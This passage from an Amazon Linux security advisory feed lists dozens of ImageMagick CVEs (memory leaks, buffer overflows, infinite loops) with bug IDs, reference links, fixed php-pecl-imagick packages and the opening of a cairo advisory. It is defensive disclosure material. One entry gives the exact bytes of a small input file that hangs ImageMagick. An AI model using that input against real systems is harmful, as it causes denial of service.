CVE-2019-7398:
In ImageMagick before 7.0.8-25, a memory leak exists in WriteDIBImage in coders/dib.c.
1672560: CVE-2019-7398 ImageMagick: Memory leak in the WriteDIBImage function in coders/dib.c
CVE-2019-7397:
In ImageMagick before 7.0.8-25 and GraphicsMagick through 1.3.31, several memory leaks exist in WritePDFImage in coders/pdf.c.
1672564: CVE-2019-7397 ImageMagick: Memory leak in the WritePDFImage function in coders/pdf.c
CVE-2019-7175:
In ImageMagick before 7.0.8-25, some memory leaks exist in DecodeImage in coders/pcd.c.
1687436: CVE-2019-7175 imagemagick: memory leak in function DecodeImage in coders/pcd.c
CVE-2019-19949:
In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer over-read in the function WritePNGImage of coders/png.c, related to Magick_png_write_raw_profile and LocaleNCompare.
1792480: CVE-2019-19949 ImageMagick: heap-based buffer over-read in WritePNGImage in coders/png.c
CVE-2019-19948:
In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer overflow in the function WriteSGIImage of coders/sgi.c.
1793177: CVE-2019-19948 ImageMagick: heap-based buffer overflow in WriteSGIImage in coders/sgi.c
CVE-2019-17541:
ImageMagick before 7.0.8-55 has a use-after-free in DestroyStringInfo in MagickCore/string.c because the error manager is mishandled in coders/jpeg.c.
1767087: CVE-2019-17541 ImageMagick: Use after free in ReadICCProfile function in coders/jpeg.c
CVE-2019-17540:
ImageMagick before 7.0.8-54 has a heap-based buffer overflow in ReadPSInfo in coders/ps.c.
1765330: CVE-2019-17540 ImageMagick: heap-based buffer overflow in ReadPSInfo in coders/ps.c
CVE-2019-16713:
ImageMagick 7.0.8-43 has a memory leak in coders/dot.c, as demonstrated by PingImage in MagickCore/constitute.c.
1801681: CVE-2019-16713 ImageMagick: memory leak in coders/dot.c
CVE-2019-16712:
ImageMagick 7.0.8-43 has a memory leak in Huffman2DEncodeImage in coders/ps3.c, as demonstrated by WritePS3Image.
1801674: CVE-2019-16712 ImageMagick: memory leak in Huffman2DEncodeImage in coders/ps3.c
CVE-2019-16711:
ImageMagick 7.0.8-40 has a memory leak in Huffman2DEncodeImage in coders/ps2.c.
1801673: CVE-2019-16711 ImageMagick: memory leak in Huffman2DEncodeImage in coders/ps2.c
CVE-2019-16710:
ImageMagick 7.0.8-35 has a memory leak in coders/dot.c, as demonstrated by AcquireMagickMemory in MagickCore/memory.c.
1801667: CVE-2019-16710 ImageMagick: memory leak in coders/dot.c
CVE-2019-16709:
ImageMagick 7.0.8-35 has a memory leak in coders/dps.c, as demonstrated by XCreateImage.
1801661: CVE-2019-16709 ImageMagick: memory leak in coders/dps.c
CVE-2019-16708:
ImageMagick 7.0.8-35 has a memory leak in magick/xwindow.c, related to XCreateImage.
1801665: CVE-2019-16708 ImageMagick: memory leak in magick/xwindow.c
CVE-2019-15141:
WriteTIFFImage in coders/tiff.c in ImageMagick 7.0.8-43 Q16 allows attackers to cause a denial-of-service (application crash resulting from a heap-based buffer over-read) via a crafted TIFF image file, related to TIFFRewriteDirectory, TIFFWriteDirectory, TIFFWriteDirectorySec, and TIFFWriteDirectoryTagColormap in tif_dirwrite.c of LibTIFF. NOTE: this occurs because of an incomplete fix for CVE-2019-11597.
1767802: CVE-2019-15141 ImageMagick: heap-based buffer overflow in WriteTIFFImage in coders/tiff.c
CVE-2019-15140:
coders/mat.c in ImageMagick 7.0.8-43 Q16 allows remote attackers to cause a denial of service (use-after-free and application crash) or possibly have unspecified other impact by crafting a Matlab image file that is mishandled in ReadImage in MagickCore/constitute.c.
1767828: CVE-2019-15140 ImageMagick: Use after free in ReadMATImage in coders/mat.c
CVE-2019-15139:
The XWD image (X Window System window dumping file) parsing component in ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (application crash resulting from an out-of-bounds Read) in ReadXWDImage in coders/xwd.c by crafting a corrupted XWD image file, a different vulnerability than CVE-2019-11472.
1767812: CVE-2019-15139 ImageMagick: out-of-bounds read in ReadXWDImage in coders/xwd.c
CVE-2019-14981:
In ImageMagick 7.x before 7.0.8-41 and 6.x before 6.9.10-41, there is a divide-by-zero vulnerability in the MeanShiftImage function. It allows an attacker to cause a denial of service by sending a crafted file.
1757911: CVE-2019-14981 ImageMagick: division by zero in MeanShiftImage in MagickCore/feature.c
CVE-2019-14980:
In ImageMagick 7.x before 7.0.8-42 and 6.x before 6.9.10-42, there is a use after free vulnerability in the UnmapBlob function that allows an attacker to cause a denial of service by sending a crafted file.
1757779: CVE-2019-14980 ImageMagick: use-after-free in magick/blob.c resulting in a denial of service
CVE-2019-13454:
ImageMagick 7.0.8-54 Q16 allows Division by Zero in RemoveDuplicateLayers in MagickCore/layer.c.
1728474: CVE-2019-13454 ImageMagick: division by zero in RemoveDuplicateLayers in MagickCore/layer.c
CVE-2019-13311:
ImageMagick 7.0.8-50 Q16 has memory leaks at AcquireMagickMemory because of a wand/mogrify.c error.
1730329: CVE-2019-13311 ImageMagick: memory leaks at AcquireMagickMemory because of a wand/mogrify.c error
CVE-2019-13310:
ImageMagick 7.0.8-50 Q16 has memory leaks at AcquireMagickMemory because of an error in MagickWand/mogrify.c.
1730333: CVE-2019-13310 ImageMagick: memory leaks at AcquireMagickMemory because of an error in MagickWand/mogrify.c
CVE-2019-13309:
ImageMagick 7.0.8-50 Q16 has memory leaks at AcquireMagickMemory because of mishandling the NoSuchImage error in CLIListOperatorImages in MagickWand/operation.c.
1730337: CVE-2019-13309 ImageMagick: memory leaks at AcquireMagickMemory due to mishandling the NoSuchImage error in CLIListOperatorImages
CVE-2019-13307:
ImageMagick 7.0.8-50 Q16 has a heap-based buffer overflow at MagickCore/statistic.c in EvaluateImages because of mishandling rows.
1730351: CVE-2019-13307 ImageMagick: heap-based buffer overflow at MagickCore/statistic.c in EvaluateImages because of mishandling rows
CVE-2019-13306:
ImageMagick 7.0.8-50 Q16 has a stack-based buffer overflow at coders/pnm.c in WritePNMImage because of off-by-one errors.
1730357: CVE-2019-13306 ImageMagick: stack-based buffer overflow at coders/pnm.c in WritePNMImage because of off-by-one errors
CVE-2019-13305:
ImageMagick 7.0.8-50 Q16 has a stack-based buffer overflow at coders/pnm.c in WritePNMImage because of a misplaced strncpy and an off-by-one error.
1730361: CVE-2019-13305 ImageMagick: stack-based buffer overflow at coders/pnm.c in WritePNMImage because of a misplaced strncpy and an off-by-one error
CVE-2019-13304:
ImageMagick 7.0.8-50 Q16 has a stack-based buffer overflow at coders/pnm.c in WritePNMImage because of a misplaced assignment.
1730364: CVE-2019-13304 ImageMagick: stack-based buffer overflow at coders/pnm.c in WritePNMImage because of a misplaced assignment
CVE-2019-13301:
ImageMagick 7.0.8-50 Q16 has memory leaks in AcquireMagickMemory because of an AnnotateImage error.
1730575: CVE-2019-13301 ImageMagick: memory leaks in AcquireMagickMemory
CVE-2019-13300:
ImageMagick 7.0.8-50 Q16 has a heap-based buffer overflow at MagickCore/statistic.c in EvaluateImages because of mishandling columns.
1730580: CVE-2019-13300 ImageMagick: heap-based buffer overflow at MagickCore/statistic.c in EvaluateImages because of mishandling columns
CVE-2019-13297:
ImageMagick 7.0.8-50 Q16 has a heap-based buffer over-read at MagickCore/threshold.c in AdaptiveThresholdImage because a height of zero is mishandled.
1730596: CVE-2019-13297 ImageMagick: heap-based buffer over-read at MagickCore/threshold.c in AdaptiveThresholdImage because a height of zero is mishandled
CVE-2019-13295:
ImageMagick 7.0.8-50 Q16 has a heap-based buffer over-read at MagickCore/threshold.c in AdaptiveThresholdImage because a width of zero is mishandled.
1730604: CVE-2019-13295 ImageMagick: heap-based buffer over-read at MagickCore/threshold.c in AdaptiveThresholdImage because a width of zero is mishandled
CVE-2019-13135:
ImageMagick before 7.0.8-50 has a "use of uninitialized value" vulnerability in the function ReadCUTImage in coders/cut.c.
1726104: CVE-2019-13135 ImageMagick: a "use of uninitialized value" vulnerability in the function ReadCUTImage leading to a crash and DoS
CVE-2019-13134:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadVIFFImage in coders/viff.c.
1726081: CVE-2019-13134 ImageMagick: a memory leak vulnerability in the function ReadVIFFImage in coders/viff.c
CVE-2019-13133:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadBMPImage in coders/bmp.c.
1726078: CVE-2019-13133 ImageMagick: a memory leak vulnerability in the function ReadBMPImage in coders/bmp.c
CVE-2019-12979:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the SyncImageSettings function in MagickCore/image.c. This is related to AcquireImage in magick/image.c.
1732294: CVE-2019-12979 imagemagick: use of uninitialized value in functionSyncImageSettings in MagickCore/image.c
CVE-2019-12978:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the ReadPANGOImage function in coders/pango.c.
1732292: CVE-2019-12978 imagemagick: use of uninitialized value in function ReadPANGOImage in coders/pango.c
CVE-2019-12976:
ImageMagick 7.0.8-34 has a memory leak in the ReadPCLImage function in coders/pcl.c.
1732284: CVE-2019-12976 imagemagick: memory leak vulnerability in function ReadPCLImage in coders/pcl.c
CVE-2019-12975:
ImageMagick 7.0.8-34 has a memory leak vulnerability in the WriteDPXImage function in coders/dpx.c.
1732282: CVE-2019-12975 imagemagick: memory leak vulnerability in function WriteDPXImage in coders/dpx.c
CVE-2019-12974:
A NULL pointer dereference in the function ReadPANGOImage in coders/pango.c and the function ReadVIDImage in coders/vid.c in ImageMagick 7.0.8-34 allows remote attackers to cause a denial of service via a crafted image.
1732278: CVE-2019-12974 imagemagick: null-pointer dereference in function ReadPANGOImage in coders/pango.c and ReadVIDImage in coders/vid.c causing denial of service
CVE-2019-11598:
In ImageMagick 7.0.8-40 Q16, there is a heap-based buffer over-read in the function WritePNMImage of coders/pnm.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file. This is related to SetGrayscaleImage in MagickCore/quantize.c.
1705414: CVE-2019-11598 ImageMagick: heap-based buffer over-read in the function WritePNMImage of coders/pnm.c leading to DoS or information disclosure
CVE-2019-11597:
In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file.
1705406: CVE-2019-11597 ImageMagick: heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c leading to DoS or information disclosure
CVE-2019-11472:
ReadXWDImage in coders/xwd.c in the XWD image parsing component of ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (divide-by-zero error) by crafting an XWD image file in which the header indicates neither LSB first nor MSB first.
1707768: CVE-2019-11472 ImageMagick: denial of service in ReadXWDImage in coders/xwd.c in the XWD image parsing component
CVE-2019-11470:
The cineon parsing component in ImageMagick 7.0.8-26 Q16 allows attackers to cause a denial-of-service (uncontrolled resource consumption) by crafting a Cineon image with an incorrect claimed image size. This occurs because ReadCINImage in coders/cin.c lacks a check for insufficient image data in a file.
1707770: CVE-2019-11470 ImageMagick: denial of service in cineon parsing component
CVE-2019-10650:
In ImageMagick 7.0.8-36 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or information disclosure via a crafted image file.
1700755: CVE-2019-10650 ImageMagick: heap-based buffer over-read in WriteTIFFImage of coders/tiff.c leads to denial of service or information disclosure via crafted image file
CVE-2019-10131:
An off-by-one read vulnerability was discovered in ImageMagick before version 7.0.7-28 in the formatIPTCfromBuffer function in coders/meta.c. A local attacker may use this flaw to read beyond the end of the buffer or to crash the program.
1704762: CVE-2019-10131 ImageMagick: off-by-one read in formatIPTCfromBuffer function in coders/meta.c
CVE-2018-9133:
ImageMagick 7.0.7-26 Q16 has excessive iteration in the DecodeLabImage and EncodeLabImage functions (coders/tiff.c), which results in a hang (tens of minutes) with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted tiff file.
1563875: CVE-2018-9133 ImageMagick: excessive iteration in the DecodeLabImage and EncodeLabImage functions in coders/tiff.c
CVE-2018-8804:
WriteEPTImage in coders/ept.c in ImageMagick 7.0.7-25 Q16 allows remote attackers to cause a denial of service (MagickCore/memory.c double free and application crash) or possibly have unspecified other impact via a crafted file.
1559892: CVE-2018-8804 ImageMagick: double free in WriteEPTImage function in coders/ept.c
CVE-2018-20467:
In coders/bmp.c in ImageMagick before 7.0.8-16, an input file can result in an infinite loop and hang, with high CPU and memory consumption. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
1664845: CVE-2018-20467 ImageMagick: infinite loop in coders/bmp.c
CVE-2018-18544:
There is a memory leak in the function WriteMSLImage of coders/msl.c in ImageMagick 7.0.8-13 Q16, and the function ProcessMSLScript of coders/msl.c in GraphicsMagick before 1.3.31.
1642614: CVE-2018-18544 ImageMagick: memory leak in WriteMSLImage of coders/msl.c
CVE-2018-16750:
In ImageMagick 7.0.7-29 and earlier, a memory leak in the formatIPTCfromBuffer function in coders/meta.c was found.
1627917: CVE-2018-16750 ImageMagick: Memory leak in the formatIPTCfromBuffer function in coders/meta.c
CVE-2018-16749:
In ImageMagick 7.0.7-29 and earlier, a missing NULL check in ReadOneJNGImage in coders/png.c allows an attacker to cause a denial of service (WriteBlob assertion failure and application exit) via a crafted file.
1627916: CVE-2018-16749 ImageMagick: reachable assertion in ReadOneJNGImage in coders/png.c
CVE-2018-16328:
In ImageMagick before 7.0.8-8, a NULL pointer dereference exists in the CheckEventLogging function in MagickCore/log.c.
1624955: CVE-2018-16328 ImageMagick: NULL pointer dereference in CheckEventLogging function in MagickCore/log.c
CVE-2018-15607:
In ImageMagick 7.0.8-11 Q16, a tiny input file 0x50 0x36 0x36 0x36 0x36 0x4c 0x36 0x38 0x36 0x36 0x36 0x36 0x36 0x36 0x1f 0x35 0x50 0x00 can result in a hang of several minutes during which CPU and memory resources are consumed until ultimately an attempted large memory allocation fails. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
1622738: CVE-2018-15607 ImageMagick: CPU Exhaustion via crafted input file
CVE-2018-14437:
ImageMagick 7.0.8-4 has a memory leak in parse8BIM in coders/meta.c.
1609942: CVE-2018-14437 ImageMagick: memory leak in parse8BIM in coders/meta.c
CVE-2018-14436:
ImageMagick 7.0.8-4 has a memory leak in ReadMIFFImage in coders/miff.c.
1609939: CVE-2018-14436 ImageMagick: memory leak in ReadMIFFImage in coders/miff.c
CVE-2018-14435:
ImageMagick 7.0.8-4 has a memory leak in DecodeImage in coders/pcd.c.
1609936: CVE-2018-14435 ImageMagick: memory leak in DecodeImage in coders/pcd.c
CVE-2018-14434:
ImageMagick 7.0.8-4 has a memory leak for a colormap in WriteMPCImage in coders/mpc.c.
1609933: CVE-2018-14434 ImageMagick: memory leak for a colormap in WriteMPCImage in coders/mpc.c
CVE-2018-13153:
In ImageMagick 7.0.8-4, there is a memory leak in the XMagickCommand function in MagickCore/animate.c.
1598471: CVE-2018-13153 ImageMagick: memory leak in the XMagickCommand function in MagickCore/animate.c
CVE-2018-12600:
In ImageMagick 7.0.8-3 Q16, ReadDIBImage and WriteDIBImage in coders/dib.c allow attackers to cause an out of bounds write via a crafted file.
1594339: CVE-2018-12600 ImageMagick: out of bounds write ReadDIBImage and WriteDIBImage in coders/dib.c
CVE-2018-12599:
In ImageMagick 7.0.8-3 Q16, ReadBMPImage and WriteBMPImage in coders/bmp.c allow attackers to cause an out of bounds write via a crafted file.
1594338: CVE-2018-12599 ImageMagick: out of bounds write in ReadBMPImage and WriteBMPImage in coders/bmp.c
CVE-2018-11656:
In ImageMagick 7.0.7-20 Q16 x86_64, a memory leak vulnerability was found in the function ReadDCMImage in coders/dcm.c, which allows attackers to cause a denial of service via a crafted DCM image file.
1588170: CVE-2018-11656 ImageMagick: memory leak in ReadDCMImage function in coders/dcm.c
CVE-2018-10805:
ImageMagick version 7.0.7-28 contains a memory leak in ReadYCBCRImage in coders/ycbcr.c.
1577398: CVE-2018-10805 ImageMagick: Memory leak in ReadYCBCRImage
CVE-2018-10804:
ImageMagick version 7.0.7-28 contains a memory leak in WriteTIFFImage in coders/tiff.c.
1577399: CVE-2018-10804 ImageMagick: Memory leak in WriteTIFFImage
CVE-2018-10177:
In ImageMagick 7.0.7-28, there is an infinite loop in the ReadOneMNGImage function of the coders/png.c file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted mng file.
1572044: CVE-2018-10177 ImageMagick: Infinite loop in coders/png.c:ReadOneMNGImage() allows attackers to cause a denial of service via crafted MNG file
CVE-2017-18273:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadTXTImage in coders/txt.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted image file that is mishandled in a GetImageIndexInList call.
1581489: CVE-2017-18273 ImageMagick: infinite loop ReadTXTImage in function in coders/txt.c
CVE-2017-18271:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadMIFFImage in coders/miff.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted MIFF image file.
1581486: CVE-2017-18271 ImageMagick: infinite loop in ReadMIFFImage function in coders/miff.c
CVE-2017-18254:
An issue was discovered in ImageMagick 7.0.7. A memory leak vulnerability was found in the function WriteGIFImage in coders/gif.c, which allow remote attackers to cause a denial of service via a crafted file.
1561744: CVE-2017-18254 ImageMagick: memory leak in WriteGIFImage function in coders/gif.c
CVE-2017-18252:
An issue was discovered in ImageMagick 7.0.7. The MogrifyImageList function in MagickWand/mogrify.c allows attackers to cause a denial of service (assertion failure and application exit in ReplaceImageInList) via a crafted file.
1561742: CVE-2017-18252 ImageMagick: assertion failure in MogrifyImageList function in MagickWand/mogrify.c
CVE-2017-18251:
An issue was discovered in ImageMagick 7.0.7. A memory leak vulnerability was found in the function ReadPCDImage in coders/pcd.c, which allow remote attackers to cause a denial of service via a crafted file.
1561741: CVE-2017-18251 ImageMagick: memory leak in ReadPCDImage function in coders/pcd.c
CVE-2017-12806:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function format8BIM, which allows attackers to cause a denial of service.
1708517: CVE-2017-12806 ImageMagick: memory exhaustion in function format8BIM causing denial of service
CVE-2017-12805:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function ReadTIFFImage, which allows attackers to cause a denial of service.
1708521: CVE-2017-12805 ImageMagick: memory exhaustion in function ReadTIFFImage causing denial of service
CVE-2017-11166:
The ReadXWDImage function in coders\xwd.c in ImageMagick 7.0.5-6 has a memory leak vulnerability that can cause memory exhaustion via a crafted length (number of color-map entries) field in the header of an XWD file.
1772643: CVE-2017-11166 ImageMagick: memory leak vulnerability in ReadXWDImage function in coders/xwd.c
CVE-2017-1000476:
ImageMagick 7.0.7-12 Q16, a CPU exhaustion vulnerability was found in the function ReadDDSInfo in coders/dds.c, which allows attackers to cause a denial of service.
1532845: CVE-2017-1000476 ImageMagick: CPU exhaustion vulnerability in function ReadDDSInfo in coders/dds.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000476" title="" id="CVE-2017-1000476" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11166" title="" id="CVE-2017-11166" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12805" title="" id="CVE-2017-12805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12806" title="" id="CVE-2017-12806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18251" title="" id="CVE-2017-18251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18252" title="" id="CVE-2017-18252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18254" title="" id="CVE-2017-18254" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18271" title="" id="CVE-2017-18271" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18273" title="" id="CVE-2017-18273" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10177" title="" id="CVE-2018-10177" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10804" title="" id="CVE-2018-10804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10805" title="" id="CVE-2018-10805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11656" title="" id="CVE-2018-11656" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12599" title="" id="CVE-2018-12599" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12600" title="" id="CVE-2018-12600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13153" title="" id="CVE-2018-13153" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14434" title="" id="CVE-2018-14434" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14435" title="" id="CVE-2018-14435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14436" title="" id="CVE-2018-14436" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14437" title="" id="CVE-2018-14437" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15607" title="" id="CVE-2018-15607" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16328" title="" id="CVE-2018-16328" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16749" title="" id="CVE-2018-16749" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16750" title="" id="CVE-2018-16750" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18544" title="" id="CVE-2018-18544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20467" title="" id="CVE-2018-20467" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8804" title="" id="CVE-2018-8804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9133" title="" id="CVE-2018-9133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10131" title="" id="CVE-2019-10131" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10650" title="" id="CVE-2019-10650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" title="" id="CVE-2019-11470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" title="" id="CVE-2019-11472" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" title="" id="CVE-2019-11597" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" title="" id="CVE-2019-11598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" title="" id="CVE-2019-12974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" title="" id="CVE-2019-12975" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" title="" id="CVE-2019-12976" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" title="" id="CVE-2019-12978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" title="" id="CVE-2019-12979" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13133" title="" id="CVE-2019-13133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13134" title="" id="CVE-2019-13134" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" title="" id="CVE-2019-13135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" title="" id="CVE-2019-13295" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" title="" id="CVE-2019-13297" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" title="" id="CVE-2019-13300" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" title="" id="CVE-2019-13301" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" title="" id="CVE-2019-13304" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" title="" id="CVE-2019-13305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" title="" id="CVE-2019-13306" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" title="" id="CVE-2019-13307" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" title="" id="CVE-2019-13309" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13310" title="" id="CVE-2019-13310" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" title="" id="CVE-2019-13311" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" title="" id="CVE-2019-13454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14980" title="" id="CVE-2019-14980" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" title="" id="CVE-2019-14981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" title="" id="CVE-2019-15139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" title="" id="CVE-2019-15140" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15141" title="" id="CVE-2019-15141" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" title="" id="CVE-2019-16708" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16709" title="" id="CVE-2019-16709" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" title="" id="CVE-2019-16710" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" title="" id="CVE-2019-16711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" title="" id="CVE-2019-16712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" title="" id="CVE-2019-16713" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17540" title="" id="CVE-2019-17540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17541" title="" id="CVE-2019-17541" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" title="" id="CVE-2019-19948" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" title="" id="CVE-2019-19949" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" title="" id="CVE-2019-7175" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" title="" id="CVE-2019-7397" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" title="" id="CVE-2019-7398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9956" title="" id="CVE-2019-9956" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-pecl-imagick-debuginfo" version="3.4.4" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pecl-imagick-debuginfo-3.4.4-1.8.amzn1.x86_64.rpm</filename></package><package name="php-pecl-imagick" version="3.4.4" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pecl-imagick-3.4.4-1.8.amzn1.x86_64.rpm</filename></package><package name="php-pecl-imagick-debuginfo" version="3.4.4" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-pecl-imagick-debuginfo-3.4.4-1.8.amzn1.i686.rpm</filename></package><package name="php-pecl-imagick" version="3.4.4" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-pecl-imagick-3.4.4-1.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1392</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1392: medium priority package update for cairo</title><issued date="2020-07-14 01:48:00" /><updated date="2020-07-15 17:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3190:
The fill_xrgb32_lerp_opaque_spans function in cairo-image-compositor.c in cairo before 1.14.2 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a negative span length.
CVE-2016-3190 cairo: out of bounds read in fill_xrgb32_lerp_opaque_span
